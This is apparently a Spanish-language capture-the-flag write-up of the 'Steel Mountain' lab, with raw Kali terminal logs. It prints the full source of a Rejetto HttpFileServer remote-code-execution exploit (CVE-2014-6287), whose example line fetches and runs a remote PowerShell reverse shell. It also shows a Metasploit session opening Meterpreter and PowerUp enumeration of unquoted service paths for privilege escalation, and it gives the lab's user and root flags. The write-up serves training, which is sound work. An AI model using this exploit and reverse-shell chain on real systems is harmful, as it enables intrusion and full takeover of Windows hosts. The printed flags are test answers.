🤖MONTAÑA DE ACERO
MR. ROBOT
realicé un escaneo de puertos en la máquina objetivo con Nmap. Utilicé el comando nmap -sV -sC -oN nmap.out -p- <ip de destino> para obtener información sobre los servicios y versiones que están en ejecución.
En los resultados de Nmap, identifiqué varios servicios, como un servidor web en el puerto 80, RPC y SMB en los puertos 139 y 445, y otros servicios relacionados con HTTP en puertos 5985, 8080 y 47001. Además, noté un servicio SSL en el puerto 3389, que cifra las sesiones RDP.
Pregunta: Implementar la máquina. ¿Quién es el empleado del mes?
Al explorar el sitio web en el puerto 80, encontré una imagen del "Empleado del Mes" llamado Bill Harper, gracias a un vistazo al código fuente de la página de inicio..
Respuesta: Bill Harper
Tarea 2 (Acceso Inicial)
Después de implementar la máquina, realicé otro escaneo para descubrir en qué otro puerto se ejecutaba un servidor web. Gracias al análisis anterior con Nmap, identifiqué que había un servidor de archivos HTTP (versión 2.3) en el puerto 8080.
Pregunta: Escanee la máquina con nmap. ¿En qué otro puerto se ejecuta un servidor web?
La respuesta es: 8080
Al explorar este servidor web, descubrí que se trataba del servidor de archivos HTTP Rejetto. Luego, utilicé searchsploit para encontrar el número CVE asociado con esta versión (2.3.x).
Pregunta: ¿Cuál es el número CVE para explotar este servidor de archivos?
La respuesta es: 2014–6287
Utilicé Metasploit para obtener un shell inicial, y tras la ejecución del exploit, obtuve acceso al sistema.
Pregunta: Utilice Metasploit para obtener un shell inicial. ¿Qué es la bandera de usuario?
La bandera de usuario es: b04763b6fcf51fcd7c13abc7db4fd365
Tarea 3 (Escalada de Privilegios)
Ahora, con un shell inicial, procedí a enumerar la máquina utilizando un script de PowerShell llamado PowerUp. Este script detectó anomalías y vulnerabilidades, incluida una relacionada con el servicio "AdvancedSystemCareService9".
Pregunta: Preste mucha atención a la opción CanRestart que está configurada como verdadera. ¿Cuál es el nombre del servicio que aparece como una vulnerabilidad de ruta de servicio sin comillas?
El nombre del servicio es: AdvancedSystemCareService9
Luego, para escalar mis privilegios, utilicé msfvenom para generar un shell inverso, reemplacé la aplicación legítima y reinicié el servicio para obtener acceso como root.
Pregunta: ¿Qué es la bandera raíz?
La bandera de root se encuentra en el Escritorio del administrador y es: 9af5f314f57607c00fd09803a587db80
Tarea 4 (Acceso y Escalamiento sin Metasploit)
En esta tarea, opté por utilizar un exploit sin Metasploit. Descargué un exploit específico, lo edité según las instrucciones y lo ejecuté para obtener un shell inverso.
Respuesta: No se necesita respuesta
Finalmente, utilicé winPEAS para identificar la misma vulnerabilidad que había encontrado previamente con Metasploit.
Pregunta: ¿Qué comando powershell -c podríamos ejecutar para averiguar manualmente el nombre del servicio?
El comando es: powershell -c Get-Service
Con este conocimiento adicional, generé una carga útil con msfvenom y la llevé al sistema usando PowerShell.
¡Esta tarea proporcionó una experiencia completa desde el escaneo inicial hasta la escalada de privilegios, utilizando Metasploit y también explorando opciones sin su uso!
// Some code pentestingOfensivoMONTAÑADEACERO.txt
PENTESTING OFENSIVO:
MONTAÑA DE ACERO DE MR ROBOTS:
ENNUMERACION DE EXPLORACION:
┌──(root㉿kali)-[~]
└─# nmap -sS -sV -O -Pn --script="vuln" 10.10.220.84
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-18 21:29 UTC
Stats: 0:00:02 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Stats: 0:00:29 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 45.45% done; ETC: 21:30 (0:00:20 remaining)
Stats: 0:02:44 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.64% done; ETC: 21:32 (0:00:00 remaining)
Nmap scan report for ip-10-10-220-84.eu-west-1.compute.internal (10.10.220.84)
Host is up (0.00055s latency).
Not shown: 989 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-server-header: Microsoft-IIS/8.5
| vulners:
| cpe:/a:microsoft:internet_information_services:8.5:
|_ CVE-2014-4078 5.1 https://vulners.com/cve/CVE-2014-4078
|_http-csrf: Couldn't find any CSRF vulnerabilities.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
| Modulus Type: Safe prime
| Modulus Source: RFC2409/Oakley Group 2
| Modulus Length: 1024
| Generator Length: 1024
| Public Key Length: 1024
| References:
|_ https://weakdh.org
8080/tcp open http HttpFileServer httpd 2.3
| http-fileupload-exploiter:
|
|_ Couldn't find a file-type field.
| vulners:
| cpe:/a:rejetto:httpfileserver:2.3:
| EDB-ID:49584 10.0 https://vulners.com/exploitdb/EDB-ID:49584 *EXPLOIT*
| EDB-ID:49125 10.0 https://vulners.com/exploitdb/EDB-ID:49125 *EXPLOIT*
| EDB-ID:39161 10.0 https://vulners.com/exploitdb/EDB-ID:39161 *EXPLOIT*
| EDB-ID:34668 10.0 https://vulners.com/exploitdb/EDB-ID:34668 *EXPLOIT*
| 1337DAY-ID-35849 10.0 https://vulners.com/zdt/1337DAY-ID-35849 *EXPLOIT*
| SECURITYVULNS:VULN:14023 7.5 https://vulners.com/securityvulns/SECURITYVULNS:VULN:14023
| PACKETSTORM:161503 7.5 https://vulners.com/packetstorm/PACKETSTORM:161503 *EXPLOIT*
| PACKETSTORM:160264 7.5 https://vulners.com/packetstorm/PACKETSTORM:160264 *EXPLOIT*
| PACKETSTORM:135122 7.5 https://vulners.com/packetstorm/PACKETSTORM:135122 *EXPLOIT*
| PACKETSTORM:128593 7.5 https://vulners.com/packetstorm/PACKETSTORM:128593 *EXPLOIT*
| PACKETSTORM:128243 7.5 https://vulners.com/packetstorm/PACKETSTORM:128243 *EXPLOIT*
| EXPLOITPACK:A6E51CB06A5AB6562CC6D5A235ECDE13 7.5 https://vulners.com/exploitpack/EXPLOITPACK:A6E51CB06A5AB6562CC6D5A235ECDE13 *EXPLOIT*
| EXPLOITPACK:A39709063C426496F984E8852560BBFF 7.5 https://vulners.com/exploitpack/EXPLOITPACK:A39709063C426496F984E8852560BBFF *EXPLOIT*
| 1337DAY-ID-25379 7.5 https://vulners.com/zdt/1337DAY-ID-25379 *EXPLOIT*
| 1337DAY-ID-22733 7.5 https://vulners.com/zdt/1337DAY-ID-22733 *EXPLOIT*
|_ 1337DAY-ID-22640 7.5 https://vulners.com/zdt/1337DAY-ID-22640 *EXPLOIT*
|_http-server-header: HFS 2.3
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
| http-vuln-cve2011-3192:
| VULNERABLE:
| Apache byterange filter DoS
| State: VULNERABLE
| IDs: CVE:CVE-2011-3192 BID:49303
| The Apache web server is vulnerable to a denial of service attack when numerous
| overlapping byte ranges are requested.
| Disclosure date: 2011-08-19
| References:
| https://www.tenable.com/plugins/nessus/55976
| https://seclists.org/fulldisclosure/2011/Aug/175
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
|_ https://www.securityfocus.com/bid/49303
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-method-tamper:
| VULNERABLE:
| Authentication bypass by HTTP verb tampering
| State: VULNERABLE (Exploitable)
| This web server contains password protected resources vulnerable to authentication bypass
| vulnerabilities via HTTP verb tampering. This is often found in web servers that only limit access to the
| common HTTP methods and in misconfigured .htaccess files.
|
| Extra information:
|
| URIs suspected to be vulnerable to HTTP verb tampering:
| /~login [GENERIC]
|
| References:
| http://capec.mitre.org/data/definitions/274.html
| https://www.owasp.org/index.php/Testing_for_HTTP_Methods_and_XST_%28OWASP-CM-008%29
| http://www.imperva.com/resources/glossary/http_verb_tampering.html
|_ http://www.mkit.com.ar/labs/htexploit/
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
MAC Address: 02:DA:95:D5:44:85 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=1/18%OT=80%CT=1%CU=36354%PV=Y%DS=1%DC=D%G=Y%M=02DA95%T
OS:M=65A9992D%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=2%ISR=10D%TI=I%CI=I%II=I
OS:%SS=S%TS=7)OPS(O1=M2301NW8ST11%O2=M2301NW8ST11%O3=M2301NW8NNT11%O4=M2301
OS:NW8ST11%O5=M2301NW8ST11%O6=M2301ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000
OS:%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M2301NW8NNS%CC=Y%Q=)T1(R=Y%D
OS:F=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0
OS:%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=
OS:A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=
OS:Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=A
OS:R%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%R
OS:UD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb-vuln-ms10-061: No accounts left to try
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: No accounts left to try
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 220.35 seconds
///////////////////////////////////
CORROVORAMOS SERVIDOR EN http://10.10.220.84:8080/ y buscamos un exploit ENCONTRANDOLO :
User
Login
Folder
Home
0 folders, 0 files, 0 bytes
Search
Select
All Invert Mask
0 items selected
Actions
Archive Get list
Server information
HttpFileServer 2.3
Server time: 1/18/2024 1:36:51 PM
Server uptime: 00:28:19
No files in this folder
┌──(root㉿kali)-[~]
└─# searchsploit HttpFileServer
--------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------- ---------------------------------
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3) | windows/webapps/49125.py
--------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root㉿kali)-[~]
└─# searchsploit -m windows/webapps/49125.py
Exploit: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
URL: https://www.exploit-db.com/exploits/49125
Path: /usr/share/exploitdb/exploits/windows/webapps/49125.py
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /root/49125.py
┌──(root㉿kali)-[~]
└─# ls
49125.py Desktop Documents Downloads Music Pictures Public Templates Videos
┌──(root㉿kali)-[~]
└─# cat 49125.py -l python
cat: invalid option -- 'l'
Try 'cat --help' for more information.
┌──(root㉿kali)-[~]
└─# cat 49125.py
# Exploit Title: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
# Google Dork: intext:"httpfileserver 2.3"
# Date: 28-11-2020
# Remote: Yes
# Exploit Author: Óscar Andreu
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
#!/usr/bin/python3
# Usage : python3 Exploit.py <RHOST> <Target RPORT> <Command>
# Example: python3 HttpFileServer_2.3.x_rce.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4/shells/mini-reverse.ps1')"
import urllib3
import sys
import urllib.parse
try:
http = urllib3.PoolManager()
url = f'http://{sys.argv[1]}:{sys.argv[2]}/?search=%00{{.+exec|{urllib.parse.quote(sys.argv[3])}.}}'
print(url)
response = http.request('GET', url)
except Exception as ex:
print("Usage: python3 HttpFileServer_2.3.x_rce.py RHOST RPORT command")
print(ex)
////////////////////////////////
CON METASPLOIT ENCONTRAMOS EL EXPLOIT PARA HTTPFILESERVER Y LOGRAMOS UNA SESION DE METERPRETER:
┌──(root㉿kali)-[~]
└─# msfconsole
+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __________________ | |
| ==c(______(o(______(_() | |""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
| // \\ | ********************* |
+---------------------------+---------------------------+
| o O o | \'\/\/\/'/ |
| o O | )======( |
| o | .' LOOT '. |
| |^^^^^^^^^^^^^^|l___ | / _||__ \ |
| | PAYLOAD |""\___, | / (_||_ \ |
| |________________|__|)__| | | __||_) | |
| |(@)(@)"""**|(@)(@)**|(@) | " || " |
| = = = = = = = = = = = = | '--------------' |
+---------------------------+---------------------------+
=[ metasploit v6.2.23-dev ]
+ -- --=[ 2259 exploits - 1188 auxiliary - 402 post ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Save the current environment with the
save command, future console restarts will use this
environment again
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search httpfileserver
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/rejetto_hfs_exec
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/rejetto_hfs_exec) > ls
[*] exec: ls
49125.py Desktop Documents Downloads Music Pictures Public Templates Videos
msf6 exploit(windows/http/rejetto_hfs_exec) > set RHOSTS 10.10.220.84
RHOSTS => 10.10.220.84
msf6 exploit(windows/http/rejetto_hfs_exec) > options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.220.84 yes The target host(s), see https://github.com/rapid7/metasploit
-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must
be an address on the local machine or 0.0.0.0 to listen on a
ll addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly genera
ted)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.53.67 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/http/rejetto_hfs_exec) > set RPORT 8080
RPORT => 8080
msf6 exploit(windows/http/rejetto_hfs_exec) > options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.220.84 yes The target host(s), see https://github.com/rapid7/metasploit
-framework/wiki/Using-Metasploit
RPORT 8080 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must
be an address on the local machine or 0.0.0.0 to listen on a
ll addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly genera
ted)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.53.67 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/http/rejetto_hfs_exec) > exploit
[*] Started reverse TCP handler on 10.10.53.67:4444
[*] Using URL: http://10.10.53.67:8080/QGDBdrjowSJK5k
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /QGDBdrjowSJK5k
[*] Sending stage (175686 bytes) to 10.10.220.84
[*] Sending stage (175686 bytes) to 10.6.93.171
[*] Sending stage (175686 bytes) to 10.6.93.171
[*] Sending stage (175686 bytes) to 10.6.93.171
[*] 10.10.220.84 - Meterpreter session 2 closed. Reason: Died
[*] Sending stage (175686 bytes) to 10.6.93.171
[!] Tried to delete %TEMP%\ckzvMJkkTQz.vbs, unknown result
[*] Meterpreter session 1 opened (10.10.53.67:4444 -> 10.10.220.84:49277) at 2024-01-18 22:11:02 +0000
[*] 10.10.220.84 - Meterpreter session 3 closed. Reason: Died
[*] Server stopped.
meterpreter >
meterpreter > sysinfo
Computer : STEELMOUNTAIN
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > guid
[+] Session GUID: 24a851e4-2c52-4888-a0da-1a4bab0eefb9
meterpreter > getpid
Current pid: 2932
meterpreter > getuid
Server username: STEELMOUNTAIN\bill
meterpreter > netstat
Connection list
===============
Proto Local address Remote address State User Inode PID/Program name
----- ------------- -------------- ----- ---- ----- ----------------
tcp 0.0.0.0:80 0.0.0.0:* LISTEN 0 0 4/System
tcp 0.0.0.0:135 0.0.0.0:* LISTEN 0 0 736/svchost.exe
tcp 0.0.0.0:445 0.0.0.0:* LISTEN 0 0 4/System
tcp 0.0.0.0:3389 0.0.0.0:* LISTEN 0 0 1904/svchost.exe
tcp 0.0.0.0:5985 0.0.0.0:* LISTEN 0 0 4/System
tcp 0.0.0.0:8080 0.0.0.0:* LISTEN 0 0 996/hfs.exe
tcp 0.0.0.0:47001 0.0.0.0:* LISTEN 0 0 4/System
tcp 0.0.0.0:49152 0.0.0.0:* LISTEN 0 0 556/wininit.exe
tcp 0.0.0.0:49153 0.0.0.0:* LISTEN 0 0 964/svchost.exe
tcp 0.0.0.0:49154 0.0.0.0:* LISTEN 0 0 1004/svchost.exe
tcp 0.0.0.0:49155 0.0.0.0:* LISTEN 0 0 652/lsass.exe
tcp 0.0.0.0:49156 0.0.0.0:* LISTEN 0 0 1212/spoolsv.exe
tcp 0.0.0.0:49169 0.0.0.0:* LISTEN 0 0 644/services.exe
tcp 0.0.0.0:49170 0.0.0.0:* LISTEN 0 0 1956/svchost.exe
tcp 10.10.220.84:139 0.0.0.0:* LISTEN 0 0 4/System
tcp 10.10.220.84:49277 10.10.53.67:4444 ESTABLISHED 0 0 2932/QuAYnAaGoYf.exe
tcp 10.10.220.84:49289 169.254.169.254:80 CLOSE_WAIT 0 0 1672/Ec2Config.exe
tcp6 :::80 :::* LISTEN 0 0 4/System
tcp6 :::135 :::* LISTEN 0 0 736/svchost.exe
tcp6 :::445 :::* LISTEN 0 0 4/System
tcp6 :::3389 :::* LISTEN 0 0 1904/svchost.exe
tcp6 :::5985 :::* LISTEN 0 0 4/System
tcp6 :::47001 :::* LISTEN 0 0 4/System
tcp6 :::49152 :::* LISTEN 0 0 556/wininit.exe
tcp6 :::49153 :::* LISTEN 0 0 964/svchost.exe
tcp6 :::49154 :::* LISTEN 0 0 1004/svchost.exe
tcp6 :::49155 :::* LISTEN 0 0 652/lsass.exe
tcp6 :::49156 :::* LISTEN 0 0 1212/spoolsv.exe
tcp6 :::49169 :::* LISTEN 0 0 644/services.exe
tcp6 :::49170 :::* LISTEN 0 0 1956/svchost.exe
tcp6 ::1:445 ::1:49287 ESTABLISHED 0 0 4/System
tcp6 ::1:49287 ::1:445 ESTABLISHED 0 0 4/System
udp 0.0.0.0:123 0.0.0.0:* 0 0 444/svchost.exe
udp 0.0.0.0:500 0.0.0.0:* 0 0 1004/svchost.exe
udp 0.0.0.0:3389 0.0.0.0:* 0 0 1904/svchost.exe
udp 0.0.0.0:4500 0.0.0.0:* 0 0 1004/svchost.exe
udp 0.0.0.0:5355 0.0.0.0:* 0 0 692/svchost.exe
udp 10.10.220.84:137 0.0.0.0:* 0 0 4/System
udp 10.10.220.84:138 0.0.0.0:* 0 0 4/System
udp6 :::123 :::* 0 0 444/svchost.exe
udp6 :::500 :::* 0 0 1004/svchost.exe
udp6 :::3389 :::* 0 0 1904/svchost.exe
udp6 :::4500 :::* 0 0 1004/svchost.exe
udp6 :::5355 :::* 0 0 692/svchost.exe
METERPRETER NO NOS PERMITE ENUM ERAR MANUALMENTE CON COMANDOS DE WINDOWS , POR LO QUE LO VAMOS A HACER CON UN SCRIPT AUTOMATIZADO DESCARGANDOLO EN NUESTRA MAQUINA ATACANTE Y LUEGO PASANDOLO PARA EJECUTARLO EN LA MAQUINA VICTIMA CON POWERSHELL:
┌──(root㉿kali)-[~]
└─# wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
--2024-01-18 22:44:12-- https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.108.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 600580 (587K) [text/plain]
Saving to: ‘PowerUp.ps1’
PowerUp.ps1 100%[====================================>] 586.50K --.-KB/s in 0.005s
2024-01-18 22:44:12 (108 MB/s) - ‘PowerUp.ps1’ saved [600580/600580]
┌──(root㉿kali)-[~]
└─# ls
2856 Desktop Downloads Pictures Public Templates user.txt
49125.py Documents Music PowerUp.ps1 QuAYnAaGoYf.exe Videos
meterpreter > upload PowerUp.ps1
[*] uploading : /root/PowerUp.ps1 -> PowerUp.ps1
[*] Uploaded 586.50 KiB of 586.50 KiB (100.0%): /root/PowerUp.ps1 -> PowerUp.ps1
[*] uploaded : /root/PowerUp.ps1 -> PowerUp.ps1
meterpreter > ls
Listing: C:\Users\bill\Desktop
==============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 600580 fil 2024-01-18 22:46:11 +0000 PowerUp.ps1
100666/rw-rw-rw- 282 fil 2019-09-27 11:07:07 +0000 desktop.ini
100666/rw-rw-rw- 70 fil 2019-09-27 12:42:38 +0000 user.txt
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell
PS > . .\PowerUp.ps1
PS > Invoke-AllChecks
ServiceName : AdvancedSystemCareService9
Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart : True
Name : AdvancedSystemCareService9
Check : Unquoted Service Paths
ServiceName : AdvancedSystemCareService9
Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart : True
Name : AdvancedSystemCareService9
Check : Unquoted Service Paths
ServiceName : AdvancedSystemCareService9
Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit; IdentityReference=STEELMOUNTAIN\bill;
Permissions=System.Object[]}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart : True
Name : AdvancedSystemCareService9
Check : Unquoted Service Paths
ServiceName : AdvancedSystemCareService9
Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe;
IdentityReference=STEELMOUNTAIN\bill; Permissions=System.Object[]}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart : True
Name : AdvancedSystemCareService9
Check : Unquoted Service Paths
ServiceName : AWSLiteAgent
Path : C:\Program Files\Amazon\XenTools\LiteAgent.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AWSLiteAgent' -Path <HijackPath>
CanRestart : False
Name : AWSLiteAgent
Check : Unquoted Service Paths
ServiceName : AWSLiteAgent
Path : C:\Program Files\Amazon\XenTools\LiteAgent.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AWSLiteAgent' -Path <HijackPath>
CanRestart : False
Name : AWSLiteAgent
Check : Unquoted Service Paths
ServiceName : IObitUnSvr
Path : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath>
CanRestart : False
Name : IObitUnSvr
Check : Unquoted Service Paths
ServiceName : IObitUnSvr
Path : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath>
CanRestart : False
Name : IObitUnSvr
Check : Unquoted Service Paths
ServiceName : IObitUnSvr
Path : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit; IdentityReference=STEELMOUNTAIN\bill;
Permissions=System.Object[]}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath>
CanRestart : False
Name : IObitUnSvr
Check : Unquoted Service Paths
ServiceName : IObitUnSvr
Path : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe;
IdentityReference=STEELMOUNTAIN\bill; Permissions=System.Object[]}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath>
CanRestart : False
Name : IObitUnSvr
Check : Unquoted Service Paths
ServiceName : LiveUpdateSvc
Path : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'LiveUpdateSvc' -Path <HijackPath>
CanRestart : False
Name : LiveUpdateSvc
Check : Unquoted Service Paths
ServiceName : LiveUpdateSvc
Path : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'LiveUpdateSvc' -Path <HijackPath>
CanRestart : False
Name : LiveUpdateSvc
Check : Unquoted Service Paths
ServiceName : LiveUpdateSvc
Path : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe;
IdentityReference=STEELMOUNTAIN\bill; Permissions=System.Object[]}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'LiveUpdateSvc' -Path <HijackPath>
CanRestart : False
Name : LiveUpdateSvc
Check : Unquoted Service Paths
ServiceName : AdvancedSystemCareService9
Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
